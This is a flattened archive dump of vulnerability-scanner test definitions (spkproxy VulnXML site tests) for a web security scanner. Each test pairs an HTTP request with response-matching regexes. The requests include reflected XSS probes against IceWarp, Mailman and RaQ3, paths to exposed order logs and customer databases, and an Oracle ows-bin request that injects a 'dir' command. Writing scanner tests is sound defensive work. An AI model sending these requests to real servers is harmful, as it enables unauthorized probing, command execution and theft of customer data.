302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-685.xml0100664000076500007650000000702407566204543017572 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mail/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-686.xml0100664000076500007650000000773307566204543017602 0ustar davedave (addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com) "IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-687.xml0100664000076500007650000000744307566204543017601 0ustar davedave (ml-name?\"><script>alert('Vulnerable')</script>;) "Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-688.xml0100664000076500007650000000745207566204543017602 0ustar davedave (<script>alert('Vulnerable')</script>") "Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mailman/listinfo/<script>alert('Vulnerable')</script>" HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-689.xml0100664000076500007650000000706507566204543017603 0ustar davedave (order.log) "EZMall2000 exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mall_log_files/order.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-68.xml0100664000076500007650000000726107566204543017510 0ustar davedave (printenv) "Apache 2.0 printenv default script does not have execute permissions but leaks file system paths." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/printenv HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Premature end of script headers\: / 200 Premature end of script headers\: / 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-690.xml0100664000076500007650000000704707566204543017573 0ustar davedave (cgiproc) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /manage/cgi/cgiproc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-691.xml0100664000076500007650000000703707566204543017573 0ustar davedave (/) "May be a web server or site manager." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /manager/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-692.xml0100664000076500007650000000703107566204543017566 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /marketing/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-693.xml0100664000076500007650000000716407566204543017576 0ustar davedave (metacart.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mcartfree/database/metacart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-694.xml0100664000076500007650000000702707566204543017575 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /members/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-695.xml0100664000076500007650000000716207566204543017576 0ustar davedave (metacart.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /metacart/database/metacart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-696.xml0100664000076500007650000000715607566204543017602 0ustar davedave (midicart.mdb) "MIDICART database is available for browsing. This should not be allowed via the web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /MIDICART/midicart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-697.xml0100664000076500007650000000704407566204543017577 0ustar davedave (admin.cgi) "Just found this cgi..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ministats/admin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-698.xml0100664000076500007650000000702407566204543017576 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /misc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-699.xml0100664000076500007650000000702707566204543017602 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mkstats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-69.xml0100664000076500007650000000716607566204543017515 0ustar davedave (search) "Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value)." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/search HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ =sourcedir 200 =sourcedir 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-700.xml0100664000076500007650000000702407566204543017556 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /msql/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-701.xml0100664000076500007650000000747407566204543017570 0ustar davedave (cList.php?root=</script><script>alert('Vulnerable')/<script>) "RaQ3 server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)/<script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)/<script> spkproxy/VulnXML/SiteTests/sitetest-702.xml0100664000076500007650000000702407566204543017560 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /odbc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-703.xml0100664000076500007650000000711407566204543017561 0ustar davedave (/) "The PaintBBS Server may allow unauthorized access to the config files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /oekaki/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ \.conf 200 \.conf 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-704.xml0100664000076500007650000000707707566204543017572 0ustar davedave (cgi/jdkRqNotify.exe) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /officescan/cgi/jdkRqNotify.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-705.xml0100664000076500007650000000714007566204543017562 0ustar davedave (ofscan.ini) "OfficeScan from Trend Micro allows anyone to read the ofscan.ini file 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /officescan/hotdownload/ofscan.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-706.xml0100664000076500007650000000702307566204543017563 0ustar davedave (/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /old/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-707.xml0100664000076500007650000000715707566204543017574 0ustar davedave (order_log.dat) "Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /order/order_log.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-708.xml0100664000076500007650000000716707566204543017576 0ustar davedave (order_log_v12.dat) "Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /order/order_log_v12.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-709.xml0100664000076500007650000000705107566204543017567 0ustar davedave (checks.txt) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/checks.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-70.xml0100664000076500007650000000722607566204543017502 0ustar davedave (test-cgi) "Apache 2.0 default script is executable and reveals system information. All default scripts should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/test-cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ PATH_TRANSLATED 200 PATH_TRANSLATED 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-710.xml0100664000076500007650000000705507566204543017563 0ustar davedave (mountain.cfg) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/mountain.cfg HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-711.xml0100664000076500007650000000705107566204543017560 0ustar davedave (orders.log) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/orders.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-712.xml0100664000076500007650000000705107566204543017561 0ustar davedave (orders.txt) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-713.xml0100664000076500007650000000716007566204543017563 0ustar davedave (order_log.dat) "Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Orders/order_log.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-714.xml0100664000076500007650000000716007566204543017564 0ustar davedave (order_log.dat) "Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/order_log.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-715.xml0100664000076500007650000000717007566204543017566 0ustar davedave (order_log_v12.dat) "Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Orders/order_log_v12.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-716.xml0100664000076500007650000000717007566204543017567 0ustar davedave (order_log_v12.dat) "Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/order_log_v12.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-717.xml0100664000076500007650000000731707566204543017573 0ustar davedave (perlidlc.bat?&dir) "The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ows-bin/perlidlc.bat?&dir HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ ows-bin\: 200 ows-bin\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-718.xml0100664000076500007650000000707607566204543017576 0ustar davedave (dbconnect.inc) "This file should not be accessible 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 